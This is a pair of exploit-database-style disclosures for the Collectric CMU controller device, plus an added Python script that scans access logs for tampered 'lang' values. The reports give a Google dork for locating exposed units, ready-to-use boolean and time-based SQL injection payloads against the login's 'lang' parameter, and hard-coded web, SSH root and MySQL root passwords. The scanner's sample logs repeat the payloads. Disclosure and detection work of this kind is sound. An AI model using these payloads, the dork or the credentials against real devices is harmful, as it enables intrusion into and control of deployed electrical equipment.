# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters,
# camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.

# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in

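For operators who need to check whether the `lang` parameter described above has been tampered with on their own device, the following added example (not part of the original report or the vendor's code) scans web access log lines and flags any `lang` value that is not a bare language name. It assumes combined-log-format lines, that `lang` travels in the query string as the report states, and that legitimate values look like `SWEDISH`; the `/index.php` path and all log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate lang values are bare language names such as SWEDISH.
LANG_OK = re.compile(r"[A-Za-z]{2,20}")
# Combined log format: client IP first, request line in the first quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')


def suspicious_lang(line):
    """Return (ip, reason, decoded values) when lang fails the allowlist, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        query = urlsplit(m.group("target")).query
    except ValueError:  # malformed target; nothing to parse
        return None
    # parse_qs percent-decodes values and maps '+' to a space.
    values = parse_qs(query, keep_blank_values=True).get("lang", [])
    if len(values) > 1:
        return (m.group("ip"), "repeated lang parameter", values)
    if values and not LANG_OK.fullmatch(values[0]):
        return (m.group("ip"), "lang outside allowlist", values)
    return None


def scan(lines):
    """Return one finding per log line whose lang parameter looks tampered with."""
    return [hit for hit in map(suspicious_lang, lines) if hit]


# Constructed sample log (documentation IPs, hypothetical /index.php path).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2018:10:00:01 +0200] "GET /index.php?username=op&lang=SWEDISH HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Sep/2018:10:00:05 +0200] "GET /index.php?lang=SWEDISH%27%20AND%201320%3D1320%20AND%20%27EXAr%27%3D%27EXAr HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Sep/2018:10:00:09 +0200] "GET /index.php?lang=SWEDISH%27+AND+SLEEP%285%29+AND+%27kglV%27%3D%27kglV HTTP/1.1" 200 512',
    '203.0.113.4 - - [15/Sep/2018:10:01:00 +0200] "GET /index.php?lang=SWEDISH&lang=ENGLISH HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Sep/2018:10:01:30 +0200] "GET /style.css HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for ip, reason, values in scan(SAMPLE_LOG):
        print(ip, reason, values)
```

The same allowlist belongs in the login handler itself, with the value bound as a query parameter rather than concatenated into the SQL string.
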
# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters, camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exist; see my other vulnerability reports.

---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin

SSH user/root credentials:
username: kplc
password: kplc

username: root
password: zoogin

*The SSH server is running Dropbear sshd 0.52 (protocol 2.0), which requires diffie-hellman-group1-sha1.

MySQL root credentials:
username: root
password: sql4u
---